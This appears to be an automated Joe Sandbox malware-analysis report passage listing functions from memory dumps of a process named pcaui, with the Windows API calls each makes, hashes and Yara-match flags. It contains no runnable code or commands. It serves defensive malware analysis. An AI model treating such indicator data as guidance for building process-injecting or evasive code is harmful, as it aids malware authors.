                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 54cc8d3cc27ed6ee498f59959bc4c6d748f36ebc8e3da0eb92e9e711eb1693cc
                                                                                    • Instruction ID: 8a0c87c75761a7ae36abc10059158c9c49aa6bde81d60bc92a643ae53a2491ae
                                                                                    • Opcode Fuzzy Hash: 54cc8d3cc27ed6ee498f59959bc4c6d748f36ebc8e3da0eb92e9e711eb1693cc
                                                                                    • Instruction Fuzzy Hash: 5E90026134140442F11071594414B160005CBE5305F56C125E1065674D8619DD527127
                                                                                    Function 047D2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 09dfa46f8f1a8aed04173be7b9e5d1d434fcc6899977071b0a0aab8fddd425b8
                                                                                    • Instruction ID: e24d4509c6d78deee3a843ca1bdcb78497efed686a9557c552386409164fef25
                                                                                    • Opcode Fuzzy Hash: 09dfa46f8f1a8aed04173be7b9e5d1d434fcc6899977071b0a0aab8fddd425b8
                                                                                    • Instruction Fuzzy Hash: 34900221211C0042F21075694C14B1700058BD4307F56C225A0155674CC915D9616522
                                                                                    Function 047D2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 05ce7322b587c83fbc8b610e7648b8cec6317f4e8841b0477078f0e6be9841d6
                                                                                    • Instruction ID: 923eabafbb8ea3c1d38c466959bfdf1fa47541231404c60837d08dddfa7eb121
                                                                                    • Opcode Fuzzy Hash: 05ce7322b587c83fbc8b610e7648b8cec6317f4e8841b0477078f0e6be9841d6
                                                                                    • Instruction Fuzzy Hash: E0900221601400426150716988449164005AFE5215756C231A0999670D8559D9656666
                                                                                    Function 047D2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 4c9364b81c200df62fe5e3ffb363a1365ee8b7bad87661bba00a32ffc1f7abc9
                                                                                    • Instruction ID: 4fb0b8e2b17bc898ec493d8bfad1a16aaee50c1a4172d484c326bd67c3373b2d
                                                                                    • Opcode Fuzzy Hash: 4c9364b81c200df62fe5e3ffb363a1365ee8b7bad87661bba00a32ffc1f7abc9
                                                                                    • Instruction Fuzzy Hash: 84900225221400022155B559060451B04459BDA355396C125F14176B0CC621D9656322
                                                                                    Function 047D2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 76f6eaf74fa7136c0549d50ecdbff6248671eb535ecd00413969d1f55da9224f
                                                                                    • Instruction ID: 1261eb02577ab0633d2fa8567f1c2c4390e6b65ab731f0e44b1ba60622b784aa
                                                                                    • Opcode Fuzzy Hash: 76f6eaf74fa7136c0549d50ecdbff6248671eb535ecd00413969d1f55da9224f
                                                                                    • Instruction Fuzzy Hash: E4900225211400032115B559070451700468BD9355356C131F1016670CD621D9616122
                                                                                    Function 047D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 7812482f5c285fae48c8c59c24bf04a812ebe187b7da55205768176bebd98e3f
                                                                                    • Instruction ID: 7ad64ad574930a4fbcf3af8c3b4868c2c56b3d067bdda7f8c8bcb15689b3f2f4
                                                                                    • Opcode Fuzzy Hash: 7812482f5c285fae48c8c59c24bf04a812ebe187b7da55205768176bebd98e3f
                                                                                    • Instruction Fuzzy Hash: C790026120240003611571594414626400A8BE4205B56C131E10156B0DC525D9917126
                                                                                    Function 047D2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 4ee384e99be60c09759214931ba138cd9b00f4c816c86bf2c59d7d858d793423
                                                                                    • Instruction ID: 40a357caa876bce63e6d5abd034ff4d334ae43aca5432d5f7b8d7c6c32fb30e5
                                                                                    • Opcode Fuzzy Hash: 4ee384e99be60c09759214931ba138cd9b00f4c816c86bf2c59d7d858d793423
                                                                                    • Instruction Fuzzy Hash: 5090023120140802F1907159440465A00058BD5305F96C125A0026774DCA15DB5977A2
                                                                                    Function 047D2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8747900994e28914479f0178ba732e244510b769c4f57594e5fe203a0b67583c
                                                                                    • Instruction ID: 14939f167b7b97de3cf98cb3449565c9c7e56ea35f78308868d7f592f689b348
                                                                                    • Opcode Fuzzy Hash: 8747900994e28914479f0178ba732e244510b769c4f57594e5fe203a0b67583c
                                                                                    • Instruction Fuzzy Hash: C390023120544842F15071594404A5600158BD4309F56C121A00657B4D9625DE55B662
                                                                                    Function 047D2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 78985e401390288d1ce481d139a6d9becde7a4fbd04955e455ba917806fafa1d
                                                                                    • Instruction ID: ac75f257a34c22d4a6171dbf559f225aacfbfdb71b8b9f178c36cad7fe494f79
                                                                                    • Opcode Fuzzy Hash: 78985e401390288d1ce481d139a6d9becde7a4fbd04955e455ba917806fafa1d
                                                                                    • Instruction Fuzzy Hash: B090023160540802F1607159441475600058BD4305F56C121A0025774D8755DB5576A2
                                                                                    Function 047D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: d0a7406ee47c05e74e078533f35384bdf639fcccbd35a8d77bb7646d9b57a4d9
                                                                                    • Instruction ID: ff43bdba3fd9e5af0560bbfcd333e4d786c9f9c0880c4cd5fccf892a08cc290a
                                                                                    • Opcode Fuzzy Hash: d0a7406ee47c05e74e078533f35384bdf639fcccbd35a8d77bb7646d9b57a4d9
                                                                                    • Instruction Fuzzy Hash: 2990023160550402F1107159451471610058BD4205F66C521A0425678D8795DA5175A3
                                                                                    Function 047D39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 26c45d06e8051128ed714482f8f206455158a40f685359e34ea7d15adb0a41c0
                                                                                    • Instruction ID: d512a95988a22c97c3bb30587de03a456fc8ea7c3ba967406f3121c93ffd84c5
                                                                                    • Opcode Fuzzy Hash: 26c45d06e8051128ed714482f8f206455158a40f685359e34ea7d15adb0a41c0
                                                                                    • Instruction Fuzzy Hash: 0190022124545102F160715D44046264005ABE4205F56C131A08156B4D8555D9557222
                                                                                    Function 0281F829 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitializeUninitialize
                                                                                    • String ID: @J7<
                                                                                    • API String ID: 3442037557-2016760708
                                                                                    • Opcode ID: aa776254b415a98ea4a82cf6e4842222d15e48cf981af06dcff67a3821408fb0
                                                                                    • Instruction ID: acd3982df84ee16ca69c21fdad30ff62b33a81c6494d9ed5f298c9ecf831e514
                                                                                    • Opcode Fuzzy Hash: aa776254b415a98ea4a82cf6e4842222d15e48cf981af06dcff67a3821408fb0
                                                                                    • Instruction Fuzzy Hash: F7313479A0060AAFDB10DFD8D8809EFB7B9BF88304B108559E509E7254D775AA45CBA0
                                                                                    Function 0281F830 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitializeUninitialize
                                                                                    • String ID: @J7<
                                                                                    • API String ID: 3442037557-2016760708
                                                                                    • Opcode ID: f040f6aab1c3b51c13cca1e9043fef7527d279e6bdd630dc57b37a9cae803679
                                                                                    • Instruction ID: 6c74463fd491f55ae7381d0f759a2126ebd76fc5c8b8ae029a8b7cbc05e46547
                                                                                    • Opcode Fuzzy Hash: f040f6aab1c3b51c13cca1e9043fef7527d279e6bdd630dc57b37a9cae803679
                                                                                    • Instruction Fuzzy Hash: D0313479A00209AFDB00DFD8D8809EFB7B9BF48304B104559E609E7254D775EE458BA0
                                                                                    Function 02823D60 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 108sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000007D0), ref: 02823E3B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID: wininet.dll
                                                                                    • API String ID: 3472027048-3354682871
                                                                                    • Opcode ID: 51293745134cc4d185ea79cc18547eea9f86914d1f6fc7df0704718da7b8f77d
                                                                                    • Instruction ID: 5ed13dd9a4e233cdb966aae0773d86451150075b4277228adcbdc8c9a041db1e
                                                                                    • Opcode Fuzzy Hash: 51293745134cc4d185ea79cc18547eea9f86914d1f6fc7df0704718da7b8f77d
                                                                                    • Instruction Fuzzy Hash: 63318DB9A01705BBD714DFA4CC80FEBB7B9EB88704F004559E61DAB280D3746A85CBA5
                                                                                    Function 028148C0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02814932
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                    • Instruction ID: f066452714b09448ca518cedef2cdd835cd2ee78396eb75846dfab359af5bc4f
                                                                                    • Opcode Fuzzy Hash: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                    • Instruction Fuzzy Hash: C7011EBDD0020DABDF10EBA4DC41FAEB779AB44308F008195A908E7281F631E758CB92
                                                                                    Function 02829BF0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessInternalW.KERNELBASE(?,?,?,?,0281868E,00000010,?,?,?,00000044,?,00000010,0281868E,?,?,?), ref: 02829C53
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateInternalProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2186235152-0
                                                                                    • Opcode ID: 00e932b0c8124f1e58f9ffec9037a3f42d09918aa1618abac4be9b69da508bf4
                                                                                    • Instruction ID: 88847c065b9282438e1ead1f59dd2fbc6871b80ed7ab09238adc622b2934348b
                                                                                    • Opcode Fuzzy Hash: 00e932b0c8124f1e58f9ffec9037a3f42d09918aa1618abac4be9b69da508bf4
                                                                                    • Instruction Fuzzy Hash: 6B0180B6214509BBCB58DE9DDC81EEB77AEAF8C754F508108BA0DE3250D630FC518BA4
                                                                                    Function 02809DB0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02809DF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: b5e49728b0acdec9bcead66404fe76623fbc04345955d2dce6f1f4653f624a12
                                                                                    • Instruction ID: 1f246ec1af7771294cd657add0eb7999177f5eb234690c49e2906c1ea78ea98f
                                                                                    • Opcode Fuzzy Hash: b5e49728b0acdec9bcead66404fe76623fbc04345955d2dce6f1f4653f624a12
                                                                                    • Instruction Fuzzy Hash: 9CF0657B34131436E22065AD9C02FD7734DCB81B61F150056F60DEA5C1D5A1B94186E6
                                                                                    Function 02809DAA Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02809DF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: 5912c503de3b571a966d09ebe02b121b9e859b7f0c6b5ca8c58eedf287c7f894
                                                                                    • Instruction ID: ab11df41b949b7f98d902863bf6e8e1b3ac9069349342b3e697629686ec090e4
                                                                                    • Opcode Fuzzy Hash: 5912c503de3b571a966d09ebe02b121b9e859b7f0c6b5ca8c58eedf287c7f894
                                                                                    • Instruction Fuzzy Hash: 64F0657A34031037E23065A98C47FDB775DCF82B61F150056F60DEB5C1DAA1B94587A6
                                                                                    Function 02829B10 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(02811D99,?,02826223,02811D99,0282596F,02826223,?,02811D99,0282596F,00001000,?,?,00000000), ref: 02829B4F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 15222f882391a6f1df90ded557e8b56f0e9c0d35b675ce76b94a4fce58941576
                                                                                    • Instruction ID: 163cd9828c64991d7ba6249ac6a5703da1d3add4d6d682d826173a6582d27d38
                                                                                    • Opcode Fuzzy Hash: 15222f882391a6f1df90ded557e8b56f0e9c0d35b675ce76b94a4fce58941576
                                                                                    • Instruction Fuzzy Hash: BAE06D79200214BBD614EF98DC45F9B77ADEFC8710F004409F909A7280D670B9118BB5
                                                                                    Function 02829B60 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,74C08500,00000007,00000000,00000004,00000000,02814138,000000F4), ref: 02829B9F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: a497164907bf5a419709db9d104f4aa982b6752a18a8ef3b78ce65f3c83b4e63
                                                                                    • Instruction ID: 2858e472c969d913f6134335ec0bc7a5bf34aa444232aacd4ffd3b919827dff8
                                                                                    • Opcode Fuzzy Hash: a497164907bf5a419709db9d104f4aa982b6752a18a8ef3b78ce65f3c83b4e63
                                                                                    • Instruction Fuzzy Hash: F1E06D79610604BBD614EE99DC45FDB73ADEFC9710F004019F909A7241D630B8108BB5
                                                                                    Function 028186D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 028186FC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 3a0bcdd481e085fde582b2ede235406661690f0972f46897657c7cf6e4af0c75
                                                                                    • Instruction ID: 2d2ae01d47f846d670f67f6af7f6640460c9f650f1b263e307d744733c6bf34b
                                                                                    • Opcode Fuzzy Hash: 3a0bcdd481e085fde582b2ede235406661690f0972f46897657c7cf6e4af0c75
                                                                                    • Instruction Fuzzy Hash: 64E0263E22030427FB20AAA8DC46F62334C9F89728F184E60F81DDBAC1E338F4018250
                                                                                    Function 0281498D Relevance: 1.5, APIs: 1, Instructions: 24libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02814932
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: dde08397e3d1080f24d77cc6b00d527da95b6d712252c6e7d203f8619dc81514
                                                                                    • Instruction ID: 976043e4c8b27b22981eacbb774b244d6af796582f0dc3ebb6099276bffce589
                                                                                    • Opcode Fuzzy Hash: dde08397e3d1080f24d77cc6b00d527da95b6d712252c6e7d203f8619dc81514
                                                                                    • Instruction Fuzzy Hash: F7E0D839A4014A9ECF00CFD0CCC1F9DB36CFB05618F0483C6D928D72D1E230AA068B81
                                                                                    Function 0281118B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(?,00000111), ref: 02811197
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                    • Instruction ID: 499757bf3f363087b15ee1f60b4138c9a5840a95f6ae225ddf62d751ffd2a617
                                                                                    • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                    • Instruction Fuzzy Hash: 41D0C76BB4111C79A6115595BCC1DFEB75CDB855A5F004067FB0CD5140D661590606B1
                                                                                    Function 028184C0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,028120A0,028282AE,0282596F,02812066), ref: 028184F3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: a548a0d2e80c88423ebb55a89dc3e6d2ebf7d55ce776d3ecefd0ada522135fcd
                                                                                    • Instruction ID: fe26e224ee0f4784637058b2236b2594b484e0945ad18d8a5af0d1828c10e8ff
